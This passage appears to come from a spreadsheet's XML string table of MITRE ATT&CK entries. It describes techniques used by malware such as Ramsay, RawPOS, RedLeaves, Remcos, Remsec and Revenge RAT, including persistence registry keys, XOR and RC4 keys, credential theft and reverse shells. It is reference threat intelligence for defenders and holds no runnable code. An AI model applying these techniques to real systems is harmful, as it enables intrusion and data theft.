    <t>[Ramsay](https://attack.mitre.org/software/S0458) can use [ipconfig](https://attack.mitre.org/software/S0100) and [Arp](https://attack.mitre.org/software/S0099) to collect network configuration information, including routing information and ARP tables.(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can use &lt;code&gt;netstat&lt;/code&gt; to enumerate network connections.(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can spread itself by infecting other portable executable files on networks shared drives.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has included embedded Visual Basic scripts in malicious documents.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has used HTTP for C2.(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[RawDisk](https://attack.mitre.org/software/S0364) was used in [Shamoon](https://attack.mitre.org/software/S0140) to write to protected system locations such as the MBR and disk partitions in an effort to destroy data.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)</t>
  </si>
  <si>
    <t>[RawDisk](https://attack.mitre.org/software/S0364) has been used to directly access the hard disk to help overwrite arbitrarily sized portions of disk content.(Citation: Novetta Blockbuster Destructive Malware)</t>
  </si>
  <si>
    <t>Disk Structure Wipe</t>
  </si>
  <si>
    <t>[RawDisk](https://attack.mitre.org/software/S0364) was used in [Shamoon](https://attack.mitre.org/software/S0140) to help overwrite components of disk structure like the MBR and disk partitions.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)</t>
  </si>
  <si>
    <t>[RawPOS](https://attack.mitre.org/software/S0169) encodes credit card data it collected from the victim with XOR.(Citation: TrendMicro RawPOS April 2015)(Citation: Mandiant FIN5 GrrCON Oct 2016)(Citation: Visa RawPOS March 2015)</t>
  </si>
  <si>
    <t>[RawPOS](https://attack.mitre.org/software/S0169) dumps memory from specific processes on a victim system, parses the dumped files, and scrapes them for credit card data.(Citation: Kroll RawPOS Jan 2017)(Citation: TrendMicro RawPOS April 2015)(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>Data captured by [RawPOS](https://attack.mitre.org/software/S0169) is placed in a temporary file under a directory named "memdump".(Citation: Kroll RawPOS Jan 2017)</t>
  </si>
  <si>
    <t>New services created by [RawPOS](https://attack.mitre.org/software/S0169) are made to appear like legitimate Windows services, with names such as "Windows Management Help Service", "Microsoft Support", and "Windows Advanced Task Manager".(Citation: Kroll RawPOS Jan 2017)(Citation: TrendMicro RawPOS April 2015)(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>[RawPOS](https://attack.mitre.org/software/S0169) installs itself as a service to maintain persistence.(Citation: Kroll RawPOS Jan 2017)(Citation: TrendMicro RawPOS April 2015)(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) encrypts collected data with an incremental XOR key prior to exfiltration.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) drops and executes a malicious CPL file as its payload.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) deletes the original dropped file from the victim.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>Some [Reaver](https://attack.mitre.org/software/S0172) variants use raw TCP for C2.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) encrypts some of its files with XOR.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) queries the Registry to determine the correct Startup path to use for persistence.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) creates a shortcut file and saves it in a Startup folder to establish persistence.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) collects system information from the victim, including CPU speed, computer name, volume serial number, ANSI code page, OEM code page identifier for the OS, Microsoft Windows version, and memory information.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) collects the victim's IP address.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) collects the victim's username.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>Some [Reaver](https://attack.mitre.org/software/S0172) variants use HTTP for C2.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) installs itself as a new service.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can gather browser usernames and passwords.(Citation: Accenture Hogfish April 2018)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) is launched through use of DLL search order hijacking to load a malicious dll.(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can delete specified files.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can enumerate and search for files and directories.(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) is capable of downloading a file from a specified URL.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can use HTTP over non-standard ports, such as 995, for C2.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>A [RedLeaves](https://attack.mitre.org/software/S0153) configuration file is encrypted with a simple XOR key, 0x53.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) attempts to add a shortcut file in the Startup folder to achieve persistence. If this fails, it attempts to add Registry Run keys.(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: Accenture Hogfish April 2018)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can capture screenshots.(Citation: FireEye APT10 April 2017)(Citation: Accenture Hogfish April 2018)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) attempts to add a shortcut file in the Startup folder to achieve persistence.(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: Accenture Hogfish April 2018)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) has encrypted C2 traffic with RC4, previously using keys of 88888888 and babybear.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can gather extended system information including the hostname, OS version number, platform, memory information, time elapsed since system startup, and CPU information.(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: Accenture Hogfish April 2018)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can obtain information about network parameters.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can enumerate drives and Remote Desktop sessions.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can obtain information about the logged on user both locally and for Remote Desktop sessions.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can communicate to its C2 over HTTP and HTTPS if directed.(Citation: FireEye APT10 April 2017)(Citation: Accenture Hogfish April 2018)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can receive and execute commands with cmd.exe. It can also provide a reverse shell.(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>[Reg](https://attack.mitre.org/software/S0075) may be used to find credentials in the Windows Registry.(Citation: Pentestlab Stored Credentials)</t>
  </si>
  <si>
    <t>[Reg](https://attack.mitre.org/software/S0075) may be used to interact with and modify the Windows Registry of a local or remote system at the command-line interface.(Citation: Microsoft Reg)</t>
  </si>
  <si>
    <t>[Reg](https://attack.mitre.org/software/S0075) may be used to gather details from the Windows Registry of a local or remote system at the command-line interface.(Citation: Microsoft Reg)</t>
  </si>
  <si>
    <t>[RegDuke](https://attack.mitre.org/software/S0511) can use Dropbox as its C2 server.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[RegDuke](https://attack.mitre.org/software/S0511) can decrypt strings with a key either stored in the Registry or hardcoded in the code.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[RegDuke](https://attack.mitre.org/software/S0511) can download files from C2.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[RegDuke](https://attack.mitre.org/software/S0511) can store its encryption key in the Registry.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[RegDuke](https://attack.mitre.org/software/S0511) can use control-flow flattening or the commercially available .NET Reactor for obfuscation.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[RegDuke](https://attack.mitre.org/software/S0511) can extract and execute PowerShell scripts from C2 communications.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[RegDuke](https://attack.mitre.org/software/S0511) can hide data in images, including use of the Least Significant Bit (LSB).(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[RegDuke](https://attack.mitre.org/software/S0511) can persist using a WMI consumer that is launched every time a process named WINWORD.EXE is started.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>The [Regin](https://attack.mitre.org/software/S0019) malware platform supports many standard protocols, including SMB.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>[Regin](https://attack.mitre.org/software/S0019) leveraged several compromised universities as proxies to obscure its origin.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>[Regin](https://attack.mitre.org/software/S0019) has used a hidden file system to store some of its components.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>[Regin](https://attack.mitre.org/software/S0019) stage 1 modules for 64-bit systems have been found to be signed with fake certificates masquerading as originating from Microsoft Corporation and Broadcom Corporation.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>[Regin](https://attack.mitre.org/software/S0019) contains a keylogger.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>[Regin](https://attack.mitre.org/software/S0019) appears to have functionality to modify remote Registry information.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>The [Regin](https://attack.mitre.org/software/S0019) malware platform uses Extended Attributes to store encrypted executables.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>[Regin](https://attack.mitre.org/software/S0019) appears to have functionality to sniff for credentials passed over HTTP, SMTP, and SMB.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>The [Regin](https://attack.mitre.org/software/S0019) malware platform can use ICMP to communicate between infected computers.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>The [Regin](https://attack.mitre.org/software/S0019) malware platform can use Windows admin shares to move laterally.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>The [Regin](https://attack.mitre.org/software/S0019) malware platform supports many standard protocols, including HTTP and HTTPS.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) can capture data from the system’s microphone.(Citation: Fortinet Remcos Feb 2017)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) has a command for UAC bypassing.(Citation: Fortinet Remcos Feb 2017)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) steals and modifies data from the clipboard.(Citation: Riskiq Remcos Jan 2018)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) can search for files on the infected machine.(Citation: Riskiq Remcos Jan 2018)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) can upload and download files to and from the victim’s machine.(Citation: Riskiq Remcos Jan 2018)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) has a command for keylogging.(Citation: Fortinet Remcos Feb 2017)(Citation: Talos Remcos Aug 2018)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) has full control of the Registry, including the ability to modify it.(Citation: Riskiq Remcos Jan 2018)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) uses RC4 and base64 to obfuscate data, including Registry entries and file paths.(Citation: Talos Remcos Aug 2018)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) has a command to hide itself through injecting into another process.(Citation: Fortinet Remcos Feb 2017)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) uses the infected hosts as SOCKS5 proxies to allow for tunneling and proxying.(Citation: Riskiq Remcos Jan 2018)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) uses Python scripts.(Citation: Riskiq Remcos Jan 2018)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) can add itself to the Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; for persistence.(Citation: Fortinet Remcos Feb 2017)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) takes automated screenshots of the infected machine.(Citation: Riskiq Remcos Jan 2018)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) searches for Sandboxie and VMware on the system.(Citation: Talos Remcos Aug 2018)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) can access a system’s webcam and take pictures.(Citation: Fortinet Remcos Feb 2017)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) can launch a remote command line to execute commands on the victim’s machine.(Citation: Fortinet Remcos Feb 2017)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) has a command to capture active windows on the machine and retrieve window titles.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) encrypts and adds all gathered browser data into files for upload to C2.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) collects text from the clipboard.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) decrypts the configuration data using XOR with 25-character keys.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) performs exfiltration over [BITSAdmin](https://attack.mitre.org/software/S0190), which is also used for the C2 channel.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) searches for files on the system. (Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) gathers and exfiltrates keystrokes from the machine.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) obfuscates its configuration data with XOR.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) utilizes Run Registry keys in the HKLM hive as a persistence mechanism.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) utilizes scheduled tasks as a persistence mechanism.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) takes screenshots of windows of interest.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) uses AutoIt and VBS scripts throughout its execution process.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) uses [BITSAdmin](https://attack.mitre.org/software/S0190) to communicate with the C2 server over HTTP.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) silently executes received commands with cmd.exe.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) executes received commands with wmic.exe (for WMI commands). (Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) achieves persistence using Userinit by adding the Registry key &lt;code&gt;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit&lt;/code&gt;.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[RemoteCMD](https://attack.mitre.org/software/S0166) copies a file over to the remote system before execution.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[RemoteCMD](https://attack.mitre.org/software/S0166) can execute commands remotely by creating a new schedule task on the remote system(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[RemoteCMD](https://attack.mitre.org/software/S0166) can execute commands remotely by creating a new service on the remote system.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[RemoteUtilities](https://attack.mitre.org/software/S0592) can enumerate files and directories on a target machine.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[RemoteUtilities](https://attack.mitre.org/software/S0592) can upload and download files to and from a target machine.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[RemoteUtilities](https://attack.mitre.org/software/S0592) can use Msiexec to install a service.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[RemoteUtilities](https://attack.mitre.org/software/S0592) can take screenshots on a compromised host.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) is capable of using DNS for C2.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Full Report)(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) has a package that collects documents from any inserted USB sticks.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can add or remove applications or ports on the Windows firewall or disable it entirely.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can perform DLL injection.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can exfiltrate data via a DNS tunnel or email, separately from its C2 channel.(Citation: Kaspersky ProjectSauron Full Report)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) contains a module to move data from airgapped networks to Internet-connected systems by using a removable USB device.(Citation: Kaspersky ProjectSauron Full Report)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) has a plugin to drop and execute vulnerable Outpost Sandbox or avast! Virtualization drivers in order to gain kernel mode privileges.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) is capable of deleting files on the victim. It also securely removes itself after collecting and exfiltrating data.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Full Report)(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) is capable of listing contents of folders on the victim. [Remsec](https://attack.mitre.org/software/S0125) also searches for custom network encryption software on victims.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Full Report)(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) contains a network loader to receive executable modules from remote attackers and run them on the local victim. It can also upload and download files over HTTP and HTTPS.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) contains a keylogger component.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can obtain a list of users.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) is capable of using SMTP for C2.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Full Report)(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>The [Remsec](https://attack.mitre.org/software/S0125) loader implements itself with the name Security Support Provider, a legitimate Windows function. Various [Remsec](https://attack.mitre.org/software/S0125) .exe files mimic legitimate file names used by Microsoft, Symantec, Kaspersky, Hewlett-Packard, and VMWare. [Remsec](https://attack.mitre.org/software/S0125) also disguised malicious modules using similar filenames as custom network encryption software on victims.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Full Report)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) has a plugin that can perform ARP scanning as well as port scanning.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) is capable of using ICMP, TCP, and UDP for C2.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Full Report)</t>
  </si>
  <si>
    <t>Some data in [Remsec](https://attack.mitre.org/software/S0125) is encrypted using RC5 in CBC mode, AES-CBC with a hardcoded key, RC4, or Salsa20. Some data is also base64-encoded.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>Password Filter DLL</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) harvests plain-text credentials as a password filter registered on domain controllers.(Citation: Kaspersky ProjectSauron Full Report)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can obtain a process list from the victim.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can ping or traceroute a remote host.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) schedules the execution one of its modules by creating a new scheduler task.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can dump the SAM database.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) has a plugin to detect active drivers of some security products.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can obtain the OS version information, computer name, processor architecture, machine role, and OS edition.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can obtain information about network configuration, including the routing table, ARP cache, and DNS cache.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can obtain a list of active connections and open ports.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can obtain information about the current user.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) is capable of using HTTP and HTTPS for C2.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Full Report)(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Responder](https://attack.mitre.org/software/S0174) is used to poison name services to gather hashes and credentials from systems within a local network.(Citation: GitHub Responder)</t>
  </si>
  <si>
    <t>[Responder](https://attack.mitre.org/software/S0174) captures hashes and credentials that are sent to the system after the name services have been poisoned.(Citation: GitHub Responder)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) has a plugin for microphone interception.(Citation: Cylance Shaheen Nov 2018)(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) used blogpost.com as its primary command and control server during a campaign.(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) uses the [Forfiles](https://attack.mitre.org/software/S0193) utility to execute commands on the system.(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) has the ability to upload and download files.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) has a plugin for keylogging.(Citation: Cylance Shaheen Nov 2018)(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) uses mshta.exe to run malicious scripts on the system.(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) has a plugin for credential harvesting.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) uses the PowerShell command &lt;code&gt;Reflection.Assembly&lt;/code&gt; to load itself into memory to aid in execution.(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) creates a Registry key at &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell&lt;/code&gt; to survive a system reboot.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Revenge RAT](https://attack.mitre.org/software/S0379) has a plugin to perform RDP access.(Citation: Cylance Shaheen Nov 2018)
</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) schedules tasks to run malicious scripts at different intervals.(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) has a plugin for screen capture.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) uses Base64 to encode information sent to the C2 server.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) collects the CPU information, OS information, and system language.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) collects the IP address and MAC address from the system.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) gathers the username from the system.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) has the ability to access the webcam.(Citation: Cylance Shaheen Nov 2018)(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) uses cmd.exe to execute commands and run scripts on the victim's machine.(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) has added four additional bytes of data upon launching, then saved the changed version as &lt;code&gt;C:\ProgramData\Initech\Initech.exe&lt;/code&gt;.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) has been executed from malicious Excel or Word documents containing macros.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) has encrypted strings with a single byte XOR algorithm.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) has created a new registry entry at &lt;code&gt;HKEY_CURRENT_USERS\Software\Microsoft\Windows\CurrentVersion\Run\Graphics&lt;/code&gt; with a value of &lt;code&gt;C:\ProgramData\Initech\Initech.exe /run&lt;/code&gt;.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) has been distributed in e-mails with malicious Excel or Word documents.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) has encrypted command and control (C2) communications with a stream cipher.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) has the ability to identify the Windows version on the compromised host.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) has the ability to identify the IP address of the compromised host.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) has the ability to identify the username on the compromised host.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) can archive data using RC4 encryption and Base64 encoding prior to exfiltration.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
